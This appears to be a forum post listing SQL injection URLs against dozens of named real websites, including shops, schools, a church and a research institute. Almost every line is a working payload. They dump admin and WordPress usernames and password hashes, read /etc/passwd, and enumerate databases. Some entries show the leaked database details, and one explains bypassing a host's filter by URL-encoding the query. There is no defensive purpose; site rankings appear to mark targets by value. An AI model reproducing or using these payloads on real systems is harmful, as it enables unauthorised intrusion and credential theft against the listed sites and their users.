A small collection.
PHP: http://www.conciergequestionnaire.com/ur_here/story.php?id=-196+union+select+concat_ws(0x03a,table_schema,table_name,column_name),2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns --
PHP: http://www.gumblossombabies.com/item.php?itemid=-1+union+select+1,2,3,4,5,load_file('/etc/passwd'),7--
PHP: http://qiyuangh.g.178.com/main.php?act=charactorlist&user_id=1+and+extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))
PHP: https://www.nensa.net/calendar/index.html?id=-1252+union+select+1,2,concat_ws(0x03a,ID,user_login,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+nensa_forum.wp_users--
PHP: http://pazoogle.com/grafton-hills/Admin/getFile.php?db=sites&table=siteMediaFiles&fileId=-411'+/*!union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13*/--+h
The SQLi from 2010 was fixed, but they have pumped up their vanity metrics and opened up new access (=
Yandex TIC: 100 Page Rank: 4 Yandex Catalog: True
PHP: http://www.magniflex.ru/shop/checkout2.php?id=3+AND+extractvalue(1,user())+--+
SQL 4.1.22 => we guess the table names
Code: http://tvpc.com/Channel.php?ChannelID=1+UNION+SELECT+1,2,ChannelID,4,5,ChannelPassword,7,version(),9+from+Channels+LIMIT+0,1
Tables:
Code: http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLES+--
Columns:
Code: http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x...+--
20k traffic
http://www.zavarka.ru/texts/cgi-bin/show.cgi?id=1+union+select+1,version(),3,4,5,6,7,8+--+
admin panel: /admin/admin.php
http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c%33%2d%2d%20%31
peterhost is bypassed by fully URL-encoding the request
http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61%2c%75%73%65%72%6e%61%6d%65%2c%75%73%65%72%5f%70%61%73%73%77%6f%72%64%29%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c%33%20%66%72%6f%6d%20%70%68%70%62%62%5f%75%73%65%72%73%20%6c%69%6d%69%74%20%31%2c%31%2d%2d%20%31
PHP: http://www.revistaklan.com/material.php?id=-1074%27+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17--+f
TIC-10(R2) PR-5 AR-811,760 DMOZ
Online electronics store - NewComp. The admins were notified, but there was no reaction.
Login:
Code: http://new comp.dp.ua/ ?d=-1+union+select+login+fr om+users+--+
Password:
Code: http://new comp.dp.ua/ ?d=-1+union+select+password+fr om+users+--+
PR == 6; TIC == 1200; DMOZ, Yandex Catalog == true;
PHP: http://www.mi.ras.ru/index.php?l=1&c=1'+union+select+1,2,3,4,load_file('/etc/passwd')--+h
PR == 2;
PHP: http://www.ibanklive.com/index.php?page=contact_us_existing_03&mode=contact&ticket_id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6 --
TIC && PR == N/A;
PHP: http://video.newlifechurch.org/podcast/index.php?pid=-11+union+select+1,file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user --
http://video.newlifechurch.org/info.php
Astok-Press. St. Petersburg advertising and information newspaper.
Code: http://astok-press.ru/index.php?section=news.php&news_id=1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8--
Database Version: 5.1.51-community-log
Database name: tmp_astok
User name: tmp_astok@localhost
TIC: 240 PR: 4

Personal site of Olga Soboleva. Methods for teaching children.
Code: http://www.metodika.ru/bookitem.php?id=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12,13--
Output appears in the title.
Database Version: 5.0.51a-3ubuntu5
Database name: bi78
User name: bi78-sql@localhost
TIC: 300 PR: 4

Dead Hackers Society.
Code: http://dhs.nu/news.php?t=single&ID=1-1.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Database Version: 5.1.63-0+squeeze1
Database name: ae
User name: ae@localhost
TIC: 0 PR: 4

Ukrainian women's site.
Code: http://ladys.in.ua/index.php?page=4&cat=4&sled=800&enda=820&bl=1&num=1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
Database Version: 5.1.60
Database name: oleg_ladys
User name: oleg_ladys@localhost
TIC: 0 PR: 0
Code: http://www.coorslightpr.com/event.php?id=-28+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
TIC0 PR4 AR6,313,469
Slanger.ru: a dictionary of youth, computer and other slang and jargon
http://slanger.ru/?mode=library&r_id=-9%20union%20select%201,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7--
5.1.58-log slangerru@localhost slangerru pc-linux-gnu
PHP: http://www.aldeburghsuffolk.com/promotion.php?id=-14/**/union/**/select/**/1,2,3,4,5,6,7,concat_ws(user(),database(),version()),9--
PR2 [email protected]
PHP: http://www.cherry-italy.com/en/promotion.php?page=&id=-34/**/union/**/select/**/1,concat_ws(user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15--
PR1 [email protected]
Code: http://www.buypc.ru/promo.php?id=-10/**/union/**/select/**/1,2,3,concat_ws(user(),database(),version()),5,6
TIC 10 [email protected]
Code: http://centralparkjakarta.com/v2/promo.php?st=5&id=-478%27+union+select+1,2,group_concat(admin_id,0x03a,username,0x03a,password),4,5,6,7,8+from+admin--+f
PR5
PR == 6, TIC == 0
Code: http://www.npvideo.com/channel.php?id=-1 '+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14+from+wp_users+--+
PR == 4, TIC == 0
Code: http://www.yna.edu/5771_shabbaton.php?id=-1'+union+select+1,group_concat (column_name+separator+0x3a),3,4,5+from+information_schema.columns+where+table_name='users'+--+
PR == 4, TIC == 0
Code: http://www.bostonhigashi.org/about.php?id=-1+union+select+1,2,concat_ws (0x3a3a,database(),version(),user())+--+
PR == 3, TIC == 10
Code: http://av tech.uz/detailed?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,username,password),16,17,18,19,20,21,22,23,24,25,26+from+users+limit+1,1+--+
PR == 0, TIC == 0
Code: http://www.neo group.uz/news.php?id=-6'+union+select+1,concat_ws(0x3a,log,pas5),3,4+from+administrators+--+